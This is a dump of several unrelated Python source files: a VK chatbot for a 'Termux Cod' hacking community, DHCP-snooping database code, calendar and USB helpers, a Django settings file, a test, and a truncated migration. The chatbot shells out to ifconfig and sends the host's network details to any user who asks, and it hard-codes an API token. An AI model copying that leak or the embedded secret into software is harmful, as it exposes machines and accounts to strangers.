+{"seq_id":"230692731","text":"import vk_api\nimport os\nfrom vk_api.longpoll import VkLongPoll, VkEventType\nimport random\nfrom random import randint\nimport time\nos.system('ifconfig >>io.txt')\ni=open('io.txt')\nIP=i.read()\ndef bot_vk():\n x=128711\n def categories():\n y=716237\n def lol(user_id,message):\n vk.method('messages.send',{'user_id': user_id, 'message': message,'random_id':y})\n token='35a0b1e44117b4857a36a347b3b1c948b260b314bf7edb44494165442202ea6ff5049d5ea3225d8c90199'\n vk=vk_api.VkApi(token=token)\n longpoll=VkLongPoll(vk)\n# lol(event.user_id,'Termux_Cod/Menu/Cotigories\\n\\nвыход - exit\\n\\n')\n for event in longpoll.listen():\n if event.type==VkEventType.MESSAGE_NEW:\n y+=1\n if event.to_me:\n msg=event.text\n id_lol='https://m.vk.com/id'+str(event.user_id)+''\n print(event.user_id,msg,id_lol)\n if msg=='Показ' or msg=='top':\n lol(event.user_id,'Termux_Cod/Menu/Cotigories\\n\\nвыход - exit\\n\\n')\n if msg=='exit' or 'e':\n bot_vk()\n else:\n lol(event.user_id,'не понимаю')\n\n def y(user_id,message):\n \n vk.method('messages.send',{'user_id': user_id, 'message': message,'random_id':x})\n\n token='35a0b1e44117b4857a36a347b3b1c948b260b314bf7edb44494165442202ea6ff5049d5ea3225d8c90199'\n vk=vk_api.VkApi(token=token)\n longpoll=VkLongPoll(vk)\n for event in longpoll.listen():\n if event.type==VkEventType.MESSAGE_NEW:\n x+=1\n if event.to_me:\n r=event.text\n id_lol='https://m.vk.com/id'+str(event.user_id)+''\n print(r,id_lol)\n if r=='ip' or r=='1':\n y(event.user_id,IP)\n#ПРИВЕТСТВИЕ\n if r=='Привет' or r=='привет' or r=='Хай' or r=='хай':\n y(event.user_id,'Привет, я бот Termux Cod.\\n \\nНапиши menu.')\n\n \n#МЕНЮ\n if r=='Menu' or r=='menu' or r=='Меню' or r=='меню' or r=='Termux_Cod/Menu':\n y(event.user_id,'Termux_Cod/Menu\\n\\n1. Категории.\\n2. Правила.\\n3. Информация.\\n4. Помощь администрации.')\n\n#КАТЕГОРИИ\n if r=='1' or r=='Категории' or r=='категории' or r=='Termux_Cod/Menu/Cotigories':\n# categories()\n y(event.user_id,'Жмякай показ')\n categories()\n# if r=='fish' or r=='Fish':\n# y(event.user_id,'лол типо статья о фишинге')\n# if r=='exploit' or r=='Exploit':\n# y(event.user_id,'а это об уязвимостях')\n#ПРАВИЛА\n if r=='2' or r=='Правила' or r=='правила' or r=='Termux_Cod/Menu/Cotigories':\n y(event.user_id,'Termux_Cod/Menu/Rules\\n\\nПравила пока не зарегистрированы.')\n#ИНФОРМАЦИЯ\n if r=='3' or r=='Информация'or r=='информация' or r=='Termux_Cod/Menu/Info':\n y(event.user_id,'Termux_Cod/Menu/Info\\n\\nBot Termux Cod создан для автоматизации сообщества.\\n\\nВесь ресурс подготовлен и изложен для изучения в области IT.\\n\\nЗа ваши провокационные поступки, ответственности не несем!')\n#ПОМОЩЬ АДМИНИСТРАЦИИ\n if r=='4' or r=='Помощь администрации' or r=='помощь администрации' or r=='помощь' or r=='Termux_Cod/Menu/Help_Adm':\n y(event.user_id,'Termux_Cod/Menu/Help_Adm\\n\\nКаждый ваш лайк помогает нам быть лучше.')\n if r=='Проблема' or r=='проблема' or r=='Проблемс' or r=='Ошибка':\n y(event.user_id,'Если есть проблемы то обратитесь в тех.поддержу.\\nhttps://m.vk.com/id437306907\\nhttps://m.vk.com/id596372809')\n if r=='ошибка' or r=='sss':\n p9p()\n \n if r=='Кто я?' or r=='кто я?' or r=='Кто я' or r=='кто я':\n if event.user_id==437306907 or event.user_id==596372809:\n y(event.user_id,'Вы администратор группы.')\n else:\n y(event.user_id,'Вы не идентифицированы.')\n\n\n \n if r=='Пока' or r=='пока':\n y(event.user_id,'Да и хуй с тобой\\n\\n(:позже изменю:)')\n if r=='my id':\n y(event.user_id,id_lol)\n\n \n if r=='lol6cod':\n break\nbot_vk()\n","sub_path":"hell.py","file_name":"hell.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"48968440","text":"#!/usr/bin/env python\r\n\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ndef create_db (db_filename,schema_filename):\t#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\tCreating/opening DB file\r\n\r\n\r\n\tdb_exists = os.path.exists(db_filename)\r\n\r\n\tconn = sqlite3.connect(db_filename)\r\n\tcursor = conn.cursor()\r\n\r\n\tif not db_exists:\r\n\t\tprint('Creating schema...')\r\n\t\twith open(schema_filename, 'r') as f:\r\n\t\t\tschema = f.read()\r\n\t\tconn.executescript(schema)\r\n\t\tprint('Done')\r\n\telse:\r\n\t\tprint('Database exists, assume dhcp table does, too.')\r\n\t\r\nreturn\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ndef add_data_switches(db_filename, yamlInputData):\t\t\t#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\tRead switches info from yaml; add info to DB\r\n\r\n\tconn = sqlite3.connect(db_filename)\r\n\tcursor = conn.cursor()\r\n\r\n\twith open(yamlInputData) as file:\r\n\t\tdictSwitchData = yaml.load(file)\r\n\tlistSwitchData = []\r\n\r\n\tfor switchdata in dictSwitchData.values():\r\n\t\tfor hostname,address in switchdata.items():\r\n\t\t\ttupleSwitchItem = (hostname,address)\r\n\t\t\tlistSwitchData.append(tupleSwitchItem)\r\n\r\n\tquery = \"replace into switches values (?, ?)\"\r\n\r\n\tcursor.executemany(query, listSwitchData)\r\n\tconn.commit()\r\n\r\n\tconn.close()\r\n\r\nreturn\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ndef add_data(db_filename,dhcp_snooping_files):\t\t\t\t\t\t#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\tRead DHCP info from show ip dhcp outputs; add info to DB\r\n\r\n\tdhcp_snooping_list = []\r\n\t\r\n\twith open(dhcp_snooping_files, 'r') as file:\r\n\t\tfor strLine in file:\r\n\t\t\tdhcp_snooping_list.append(strLine.rstrip())\r\n\t\r\n\t\r\n\tlistResult = []\r\n\r\n\tfor strFileName in dhcp_snooping_list:\r\n\t\tstrHostname = re.search(regHostname,strFileName).group(1)\r\n\t\twith open(strFileName) as data:\r\n\t\t\tfor line in data:\r\n\t\t\t\tmatch = regex.search(line)\r\n\t\t\t\tif match:\r\n\t\t\t\t\tlistTempResult = list(match.groups())\r\n\t\t\t\t\tlistTempResult.append(strHostname)\r\n\t\t\t\t\tlistTempResult.append('1')\r\n\t\t\t\t\tlistTempResult.append(now)\t\r\n\t\t\t\t\tlistResult.append(tuple(listTempResult))\r\n\r\n\r\n\tprint('Inserting DHCP Snooping data')\r\n\r\n\tconn = sqlite3.connect(db_filename)\r\n\tcursor = conn.cursor()\r\n\r\n\tcursor.execute(\"update dhcp set active = 0\")\r\n\r\n\tfor row in listResult:\r\n\t\ttry:\r\n\t\t\t#print(row[0])\r\n\t\t\tquery = '''replace into dhcp (mac, ip, vlan, interface, switch, active, last_active)\r\n\t\t\t\t\t\tvalues (?, ?, ?, ?, ?, ?, ?)'''\r\n\t\t\tcursor.execute(query, row)\r\n\t\texcept sqlite3.IntegrityError as e:\r\n\t\t\tprint('Error occured: ', e)\r\n\r\n\r\n\titerResult = cursor.execute(\"select * from dhcp where active = 0\")\r\n\r\n\tlistLateDates = []\r\n\r\n\tfor row in iterResult:\r\n\t\t#print(row[6])\r\n\t\tif week_ago > datetime.strptime(row[6], '%Y-%m-%d %H:%M:%S'):\r\n\t\t\tlistLateDates.append(row[6])\r\n\r\n\tfor row in listLateDates:\r\n\t\titerResult = cursor.execute(\"select * from dhcp where active = 0\")\r\n\t\tcursor.execute(\"delete from dhcp where last_active = ?\",(row,))\r\n\t\t\r\n\tconn.commit()\r\n\r\n\tconn.close()\r\n\r\nreturn\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ndef get_data(key,value,db_filename):\r\n\r\n\t\r\n\tkeys = ['mac', 'ip', 'vlan', 'interface' , 'switch', 'active', 'last_active']\r\n\t\r\n\tif key in keys:\r\n\t\tkeys.remove(key)\r\n\telse:\r\n\t\tprint('Данный параметр не поддерживается.')\r\n\t\tprint('Допустимые значения параметров: mac, ip, vlan, interface, switch, active, last_active')\r\n\t\treturn\r\n\t\t\r\n\tconn = sqlite3.connect(db_filename)\r\n\r\n\t#Позволяет далее обращаться к данным в колонках, по имени колонки\r\n\tconn.row_factory = sqlite3.Row\r\n\r\n\tprint('\\nDetailed information for host(s) with', key, '=', value)\r\n\tprint('-' * 60)\r\n\r\n\r\n\tquery_active = 'select * from dhcp where {} = ? and active = 1'.format(key)\r\n\tquery_inactive = 'select * from dhcp where {} = ? and active = 0'.format(key)\r\n\t\r\n\tresult_active = conn.execute(query_active, (value, ))\r\n\tresult_inactive = conn.execute(query_inactive, (value, ))\r\n\r\n\tprint('Active Values:')\r\n\tprint('-' * 60)\r\n\tfor row in result_active:\r\n\t\tfor k in keys:\r\n\t\t\tprint('{:12}: {}'.format(k, row[k]))\r\n\t\tprint('-' * 60)\r\n\r\n\r\n\tprint('Inactive Values:')\r\n\tprint('-' * 60)\r\n\tfor row in result_inactive:\r\n\t\tfor k in keys:\r\n\t\t\tprint('{:12}: {}'.format(k, row[k]))\r\n\t\tprint('-' * 60)\r\n\t\t\r\nreturn\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\ndef get_all_data(db_filename):\r\n\r\n\tconn = sqlite3.connect(db_filename)\r\n\tprint('\\nВ таблице dhcp такие записи:')\r\n\tprint('-' * 60)\r\n\t\r\n\tquery_active = 'select * from dhcp where active = 1'\r\n\tquery_inactive = 'select * from dhcp where active = 0'\r\n\t\r\n\tresult_active = conn.execute(query_active).fetchall()\r\n\tresult_inactive = conn.execute(query_inactive).fetchall()\r\n\t\r\n\tprint('Active Values:')\r\n\tprint('-' * 60)\r\n\tfor row in result_active:\r\n\t\tmac, ip, vlan, interface, switch, active, last_active = row\r\n\t\tprint ('{:18} {:16} {:6} {:16} {:6} {:3}'.format(mac, ip, vlan, interface, switch, active, last_active))\r\n\r\n\tprint('Inactive Values:')\r\n\tprint('-' * 60)\r\n\tfor row in result_inactive:\r\n\t\tmac, ip, vlan, interface, switch, active = row\r\n\t\tprint ('{:18} {:16} {:6} {:16} {:6} {:3}'.format(mac, ip, vlan, interface, switch, active, last_active))\r\n\t\t\r\n\tprint()\t\r\n\t\r\nreturn\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n\r\n\r\n","sub_path":"Natenka Tasks/parse_dhcp_snooping_functions.py","file_name":"parse_dhcp_snooping_functions.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"503382375","text":"from datetime import datetime, time\nfrom icalendar import Event\nfrom django_kronos.settings import DEFAULT_TIMEZONE\n\n\ndef period_to_event(period, dt):\n '''\n convert period object to ical event\n '''\n event = Event()\n event.add('summary', period.index.course.course_code + ' ' + period.period_type + ' ' + period.group)\n start_hour = int(period.start_time)\n start_minute = int((period.start_time - start_hour) * 60)\n event.add('dtstart', datetime.combine(dt, time(start_hour, start_minute, tzinfo=DEFAULT_TIMEZONE)))\n end_hour = int(period.end_time)\n end_minute = int((period.end_time - end_hour) * 60)\n event.add('dtend', datetime.combine(dt, time(end_hour, end_minute, tzinfo=DEFAULT_TIMEZONE)))\n event.add('location', period.venue)\n return event\n\n","sub_path":"kronos/calendar.py","file_name":"calendar.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"366330242","text":"#------------------------------------------------------------------------------\n\"\"\"\n\nUSB Device\n\nA generic class for reading/writing USB devices.\n\n\"\"\"\n#------------------------------------------------------------------------------\n\nimport usb.core\nfrom array import array as Array\nfrom usbtools.usbtools import UsbTools\n\n#------------------------------------------------------------------------------\n\ndef find(vps, sn = None):\n \"\"\"lookup a usb device based on vid, pid and serial number\"\"\"\n devices = UsbTools.find_all(vps)\n # do we have any devices?\n if len(devices) == 0:\n return None, 'no device found'\n if sn is not None:\n # filter using the serial number\n devices_sn = [d for d in devices if d[2] == sn]\n if len(devices_sn) == 0:\n # we have devices, but none with this serial number\n s = []\n s.append('no device with this serial number')\n s.append('devices found:')\n for d in devices:\n s.append('%04x:%04x sn %r' % (d[0], d[1], d[2]))\n return None, '\\n'.join(s)\n else:\n devices = devices_sn\n # no devices\n if len(devices) == 0:\n return None, 'no device found'\n # multiple devices\n if len(devices) > 1:\n s = []\n s.append('multiple devices found:')\n for d in devices:\n s.append('%04x:%04x sn %r' % (d[0], d[1], d[2]))\n return None, '\\n'.join(s)\n # 1 device\n return devices[0], None\n\n#------------------------------------------------------------------------------\n\nclass usbdev_error(IOError):\n \"\"\"communication error with the USB device\"\"\"\n\nclass usbdev(object):\n \"\"\"generic USB device driver with read/write interface\"\"\"\n\n def __init__(self):\n self.usb_dev = None\n self.usb_rd_timeout = 5000\n self.usb_wr_timeout = 5000\n self.rdbuf = Array('B')\n self.rdofs = 0\n self.rdbuf_chunksize = 4 << 10\n self.wrbuf_chunksize = 4 << 10\n self.ep_in = None\n self.ep_out = None\n self._wrap_api()\n\n # public functions\n\n def open(self, vid, pid, itf=0, idx=0, sn=None, descr=None):\n \"\"\"open a new interface to the specified device\"\"\"\n self.usb_dev = UsbTools.get_device(vid, pid, idx, sn, descr)\n cfg = self.usb_dev.get_active_configuration()\n # check for a valid interface\n if itf >= cfg.bNumInterfaces:\n raise usbdev_error('invalid interface: %d' % itf)\n self._set_interface(cfg, itf)\n\n def close(self):\n \"\"\"close the interface\"\"\"\n UsbTools.release_device(self.usb_dev)\n\n def write_data(self, data):\n \"\"\"write a data buffer to the device\"\"\"\n ofs = 0\n size = len(data)\n try:\n while ofs < size:\n # how many bytes should we write?\n wr_size = self.wrbuf_chunksize\n if wr_size > size - ofs:\n # reduce the write size\n wr_size = size - ofs\n # write the bytes\n n = self._write(data[ofs : ofs + wr_size])\n if n <= 0:\n raise usbdev_error(\"USB bulk write error\")\n ofs += n\n # return the number of bytes written\n return ofs\n except usb.core.USBError as e:\n raise usbdev_error(str(e))\n\n def read_data(self, size, attempts = 1):\n \"\"\"read size bytes of data from the device\"\"\"\n data = Array('B')\n # do we have all of the data in the read buffer?\n if size <= len(self.rdbuf) - self.rdofs:\n data = self.rdbuf[self.rdofs : self.rdofs + size]\n self.rdofs += size\n return data\n # do we have some of the data in the read buffer?\n if len(self.rdbuf) - self.rdofs > 0:\n data = self.rdbuf[self.rdofs:]\n # do a usb read to get the rest...\n # read from the usb device\n try:\n bytes_to_rd = size - len(data)\n while bytes_to_rd > 0:\n # read from the usb device\n while True:\n self.rdbuf = self._read()\n self.rdofs = 0\n if len(self.rdbuf) > 0:\n break\n else:\n # no data received\n attempts -= 1\n if attempts > 0:\n # try again\n continue\n # return what we have\n return data\n # copy the read buffer into the returned data\n n = len(self.rdbuf)\n if n >= bytes_to_rd:\n # copy a partial read buffer\n data += self.rdbuf[:bytes_to_rd]\n self.rdofs = bytes_to_rd\n return data\n else:\n # copy all of the read buffer\n data += self.rdbuf\n bytes_to_rd -= n\n # read more data...\n except usb.core.USBError as e:\n raise usbdev_error(str(e))\n # never reached\n raise usbdev_error(\"internal error\")\n\n # private functions\n\n def _wrap_api(self):\n \"\"\"set _read/_write to match the USB api version\"\"\"\n import inspect\n args, varargs, varkw, defaults = inspect.getargspec(usb.core.Device.read)\n if (len(args) > 2) and (args[3] == 'interface'):\n usb_api = 1 # Require \"interface\" parameter\n else :\n usb_api = 2\n for m in ('write', 'read'):\n setattr(self, '_%s' % m, getattr(self, '_%s_v%d' % (m, usb_api)))\n\n def _set_interface(self, cfg, itf):\n \"\"\"select the interface to use\"\"\"\n self.interface = None\n for i in range(cfg.bNumInterfaces):\n x = cfg[(i,0)]\n if x.bInterfaceNumber == itf:\n self.interface = x\n endpoints = sorted([ep.bEndpointAddress for ep in self.interface])\n self.ep_out, self.ep_in = endpoints[:2]\n\n def _write_v1(self, data):\n \"\"\"Write using the deprecated API\"\"\"\n return self.usb_dev.write(self.ep_out, data, self.interface, self.usb_wr_timeout)\n\n def _read_v1(self):\n \"\"\"Read using the deprecated API\"\"\"\n return self.usb_dev.read(self.ep_in, self.rdbuf_chunksize, self.interface, self.usb_rd_timeout)\n\n def _write_v2(self, data):\n \"\"\"Write using the API introduced with pyusb 1.0.0b2\"\"\"\n return self.usb_dev.write(self.ep_out, data, self.usb_wr_timeout)\n\n def _read_v2(self):\n \"\"\"Read using the API introduced with pyusb 1.0.0b2\"\"\"\n return self.usb_dev.read(self.ep_in, self.rdbuf_chunksize, self.usb_rd_timeout)\n\n#------------------------------------------------------------------------------\n\n","sub_path":"usbdev.py","file_name":"usbdev.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"55685524","text":"# -*- coding: utf-8 -*-\n\nfrom gluon import current\nfrom gluon.storage import Storage\nfrom gluon.contrib.simplejson.ordered_dict import OrderedDict\nsettings = current.deployment_settings\nT = current.T\n\n\"\"\"\n Template settings for Crisis Portal\n\n All settings which are to configure a specific template are located here\n\n Deployers should ideally not need to edit any other files outside of their template folder\n\"\"\"\n\n# Pre-Populate\nsettings.base.prepopulate = [\"Crisis\"]\n\n# -----------------------------------------------------------------------------\n# Finance settings\nsettings.fin.currencies = {\n \"AUD\" : T(\"Australian Dollars\"),\n \"CAD\" : T(\"Canadian Dollars\"),\n \"EUR\" : T(\"Euros\"),\n \"GBP\" : T(\"Great British Pounds\"),\n \"CHF\" : T(\"Swiss Francs\"),\n \"USD\" : T(\"United States Dollars\"),\n}\n\n# Comment/uncomment modules here to disable/enable them\nsettings.modules = OrderedDict([\n # Core modules which shouldn't be disabled\n (\"default\", Storage(\n name_nice = T(\"Home\"),\n restricted = False, # Use ACLs to control access to this module\n access = None, # All Users (inc Anonymous) can see this module in the default menu & access the controller\n module_type = None # This item is not shown in the menu\n )),\n (\"admin\", Storage(\n name_nice = T(\"Administration\"),\n #description = \"Site Administration\",\n restricted = True,\n access = \"|1|\", # Only Administrators can see this module in the default menu & access the controller\n module_type = None # This item is handled separately for the menu\n )),\n (\"appadmin\", Storage(\n name_nice = T(\"Administration\"),\n #description = \"Site Administration\",\n restricted = True,\n module_type = None # No Menu\n )),\n (\"errors\", Storage(\n name_nice = T(\"Ticket Viewer\"),\n #description = \"Needed for Breadcrumbs\",\n restricted = False,\n module_type = None # No Menu\n )),\n (\"sync\", Storage(\n name_nice = T(\"Synchronization\"),\n #description = \"Synchronization\",\n restricted = True,\n access = \"|1|\", # Only Administrators can see this module in the default menu & access the controller\n module_type = None # This item is handled separately for the menu\n )),\n # Uncomment to enable internal support requests\n #(\"support\", Storage(\n # name_nice = T(\"Support\"),\n # #description = \"Support Requests\",\n # restricted = True,\n # module_type = None # This item is handled separately for the menu\n # )),\n (\"gis\", Storage(\n name_nice = T(\"Map\"),\n #description = \"Situation Awareness & Geospatial Analysis\",\n restricted = True,\n module_type = 6, # 6th item in the menu\n )),\n (\"pr\", Storage(\n name_nice = T(\"Person Registry\"),\n #description = \"Central point to record details on People\",\n restricted = True,\n access = \"|1|\", # Only Administrators can see this module in the default menu (access to controller is possible to all still)\n module_type = 10\n )),\n (\"org\", Storage(\n name_nice = T(\"Organizations\"),\n #description = 'Lists \"who is doing what & where\". Allows relief agencies to coordinate their activities',\n restricted = True,\n module_type = 1\n )),\n # All modules below here should be possible to disable safely\n (\"hrm\", Storage(\n name_nice = T(\"Staff\"),\n #description = \"Human Resources Management\",\n restricted = True,\n module_type = 2,\n )),\n (\"vol\", Storage(\n name_nice = T(\"Volunteers\"),\n #description = \"Human Resources Management\",\n restricted = True,\n module_type = 2,\n )),\n (\"cms\", Storage(\n name_nice = T(\"Content Management\"),\n #description = \"Content Management System\",\n restricted = True,\n module_type = 10,\n )),\n (\"doc\", Storage(\n name_nice = T(\"Documents\"),\n #description = \"A library of digital resources, such as photos, documents and reports\",\n restricted = True,\n module_type = 10,\n )),\n (\"msg\", Storage(\n name_nice = T(\"Messaging\"),\n #description = \"Sends & Receives Alerts via Email & SMS\",\n restricted = True,\n # The user-visible functionality of this module isn't normally required. Rather it's main purpose is to be accessed from other modules.\n module_type = None,\n )),\n (\"supply\", Storage(\n name_nice = T(\"Supply Chain Management\"),\n #description = \"Used within Inventory Management, Request Management and Asset Management\",\n restricted = True,\n module_type = None, # Not displayed\n )),\n (\"inv\", Storage(\n name_nice = T(\"Warehouse\"),\n #description = \"Receiving and Sending Items\",\n restricted = True,\n module_type = 4\n )),\n #(\"proc\", Storage(\n # name_nice = T(\"Procurement\"),\n # #description = \"Ordering & Purchasing of Goods & Services\",\n # restricted = True,\n # module_type = 10\n # )),\n (\"asset\", Storage(\n name_nice = T(\"Assets\"),\n #description = \"Recording and Assigning Assets\",\n restricted = True,\n module_type = 5,\n )),\n # Vehicle depends on Assets\n (\"vehicle\", Storage(\n name_nice = T(\"Vehicles\"),\n #description = \"Manage Vehicles\",\n restricted = True,\n module_type = 10,\n )),\n (\"req\", Storage(\n name_nice = T(\"Requests\"),\n #description = \"Manage requests for supplies, assets, staff or other resources. Matches against Inventories where supplies are requested.\",\n restricted = True,\n module_type = 10,\n )),\n (\"project\", Storage(\n name_nice = T(\"Projects\"),\n #description = \"Tracking of Projects, Activities and Tasks\",\n restricted = True,\n module_type = 2\n )),\n # required for Project\n (\"stats\", Storage(\n name_nice = T(\"Statistics\"),\n #description = \"Manages statistics\",\n restricted = True,\n module_type = None,\n )),\n (\"survey\", Storage(\n name_nice = T(\"Surveys\"),\n #description = \"Create, enter, and manage surveys.\",\n restricted = True,\n module_type = 5,\n )),\n (\"cr\", Storage(\n name_nice = T(\"Shelters\"),\n #description = \"Tracks the location, capacity and breakdown of victims in Shelters\",\n restricted = True,\n module_type = 10\n )),\n (\"hms\", Storage(\n name_nice = T(\"Hospitals\"),\n #description = \"Helps to monitor status of hospitals\",\n restricted = True,\n module_type = 10\n )),\n (\"irs\", Storage(\n name_nice = T(\"Incidents\"),\n #description = \"Incident Reporting System\",\n restricted = True,\n module_type = 10\n )),\n (\"dvi\", Storage(\n name_nice = T(\"Disaster Victim Identification\"),\n #description = \"Disaster Victim Identification\",\n restricted = True,\n module_type = 10,\n #access = \"|DVI|\", # Only users with the DVI role can see this module in the default menu & access the controller\n #audit_read = True, # Can enable Audit for just an individual module here\n #audit_write = True\n )),\n (\"mpr\", Storage(\n name_nice = T(\"Missing Person Registry\"),\n #description = \"Helps to report and search for missing persons\",\n restricted = True,\n module_type = 10,\n )),\n (\"dvr\", Storage(\n name_nice = T(\"Disaster Victim Registry\"),\n #description = \"Allow affected individuals & households to register to receive compensation and distributions\",\n restricted = True,\n module_type = 10,\n )),\n #(\"scenario\", Storage(\n # name_nice = T(\"Scenarios\"),\n # #description = \"Define Scenarios for allocation of appropriate Resources (Human, Assets & Facilities).\",\n # restricted = True,\n # module_type = 10,\n # )),\n #(\"event\", Storage(\n # name_nice = T(\"Events\"),\n # #description = \"Activate Events (e.g. from Scenario templates) for allocation of appropriate Resources (Human, Assets & Facilities).\",\n # restricted = True,\n # module_type = 10,\n # )),\n #(\"fire\", Storage(\n # name_nice = T(\"Fire Stations\"),\n # #description = \"Fire Station Management\",\n # restricted = True,\n # module_type = 1,\n # )),\n #(\"flood\", Storage(\n # name_nice = T(\"Flood Warnings\"),\n # #description = \"Flood Gauges show water levels in various parts of the country\",\n # restricted = True,\n # module_type = 10\n # )),\n #(\"member\", Storage(\n # name_nice = T(\"Members\"),\n # #description = \"Membership Management System\",\n # restricted = True,\n # module_type = 10,\n # )),\n #(\"patient\", Storage(\n # name_nice = T(\"Patient Tracking\"),\n # #description = \"Tracking of Patients\",\n # restricted = True,\n # module_type = 10\n # )),\n (\"security\", Storage(\n name_nice = T(\"Security\"),\n #description = \"Security Management System\",\n restricted = True,\n module_type = 10,\n )),\n # These are specialist modules\n # Requires RPy2\n #(\"climate\", Storage(\n # name_nice = T(\"Climate\"),\n # #description = \"Climate data portal\",\n # restricted = True,\n # module_type = 10,\n #)),\n (\"delphi\", Storage(\n name_nice = T(\"Decision Maker\"),\n #description = \"Supports the decision making of large groups of Crisis Management Experts by helping the groups create ranked list.\",\n restricted = False,\n module_type = 10,\n )),\n # @ToDo: Rewrite in a modern style\n #(\"budget\", Storage(\n # name_nice = T(\"Budgeting Module\"),\n # #description = \"Allows a Budget to be drawn up\",\n # restricted = True,\n # module_type = 10\n # )),\n # @ToDo: Port these Assessments to the Survey module\n #(\"building\", Storage(\n # name_nice = T(\"Building Assessments\"),\n # #description = \"Building Safety Assessments\",\n # restricted = True,\n # module_type = 10,\n # )),\n # Deprecated by Surveys module\n # - depends on CR, IRS & Impact\n #(\"assess\", Storage(\n # name_nice = T(\"Assessments\"),\n # #description = \"Rapid Assessments & Flexible Impact Assessments\",\n # restricted = True,\n # module_type = 10,\n # )),\n #(\"impact\", Storage(\n # name_nice = T(\"Impacts\"),\n # #description = \"Used by Assess\",\n # restricted = True,\n # module_type = None,\n # )),\n #(\"ocr\", Storage(\n # name_nice = T(\"Optical Character Recognition\"),\n # #description = \"Optical Character Recognition for reading the scanned handwritten paper forms.\",\n # restricted = False,\n # module_type = 10\n # )),\n])\n","sub_path":"private/templates/Crisis/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":11685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"386808415","text":"from os import path\nimport unittest\n\nfrom ukcp_dp import InputType, PlotType\nfrom ukcp_dp.test.test_write import run_write_test\n\n\ndef get_ls6_test_bbox_data():\n data = {}\n data[InputType.AREA] = [\"bbox\", -84667.14, 0, 676489.68, 1230247.3]\n data[InputType.SPATIAL_REPRESENTATION] = \"12km\"\n data[InputType.COLLECTION] = \"land-obs\"\n data[InputType.VARIABLE] = \"tasmax\"\n\n # image options\n data[InputType.FONT_SIZE] = \"m\"\n data[InputType.IMAGE_FORMAT] = \"png\"\n data[InputType.IMAGE_SIZE] = 1200\n\n # temporal options\n data[InputType.TIME_PERIOD] = \"mam\"\n data[InputType.TEMPORAL_AVERAGE_TYPE] = \"seas\"\n data[InputType.YEAR] = 2018\n\n base_path = path.abspath(path.dirname(__file__))\n input_files = path.join(\n base_path, \"data\", \"input_files\", \"LS6_Maps_01_bbox_seasonal.nc\"\n )\n\n reference_files = [\n path.join(\n base_path, \"data\", \"expected_outputs\", \"LS6_Maps_01_bbox_seasonal.csv\"\n )\n ]\n\n output_file_index = [0]\n return data, input_files, reference_files, output_file_index\n\n\ndef get_ls6_test_region_data():\n data, _, _, _ = get_ls6_test_bbox_data()\n data[InputType.AREA] = \"river_basin|all\"\n data[InputType.SPATIAL_REPRESENTATION] = \"river_basin\"\n\n # temporal options\n data[InputType.TIME_PERIOD] = \"aug\"\n data[InputType.TEMPORAL_AVERAGE_TYPE] = \"mon\"\n\n base_path = path.abspath(path.dirname(__file__))\n input_files = path.join(\n base_path, \"data\", \"input_files\", \"LS6_Maps_01_river_monthly.nc\"\n )\n\n reference_files = [\n path.join(\n base_path, \"data\", \"expected_outputs\", \"LS6_Maps_01_river_monthly.csv\"\n )\n ]\n\n output_file_index = [0]\n return data, input_files, reference_files, output_file_index\n\n\nclass SingleMapCsvTestCase(unittest.TestCase):\n def test_single_map_csv(self):\n \"\"\"\n Test that the single map csv writer writes the correct csv values.\n \"\"\"\n inputs = [(get_ls6_test_bbox_data()), (get_ls6_test_region_data())]\n\n for data, input_files, reference_files, output_file_index in inputs:\n with self.subTest(\n data=data,\n input_files=input_files,\n reference_files=reference_files,\n output_file_index=output_file_index,\n ):\n diff = run_write_test(\n data,\n input_files,\n reference_files,\n output_file_index,\n PlotType.SINGLE_MAP,\n )\n self.assertEqual(diff, \"\", diff)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"ukcp_dp/test/test_write_csv_single_map.py","file_name":"test_write_csv_single_map.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"332922864","text":"from django.db import migrations\nfrom nalkinscloud_mosquitto.models import DeviceType, DeviceModel\n\n\ndef create_device_types(apps, schema_editor):\n device_type = DeviceType.objects.create()\n device_type_list = ['dht', 'switch', 'magnet', 'distillery', 'service', 'user',]\n for type_name in device_type_list:\n if type_name is not None:\n print('#' + type_name + '#')\n device_type.type = type_name\n device_type.save()\n\n\ndef create_device_models(apps, schema_editor):\n device_model = DeviceModel.objects.create()\n device_model_list = ['esp8266', 'service', 'application',]\n for model_name in device_model_list:\n if model_name is not None:\n print('#' + model_name + '#')\n device_model.type = model_name\n device_model.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('order', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(create_device_types),\n migrations.RunPython(create_device_models),\n 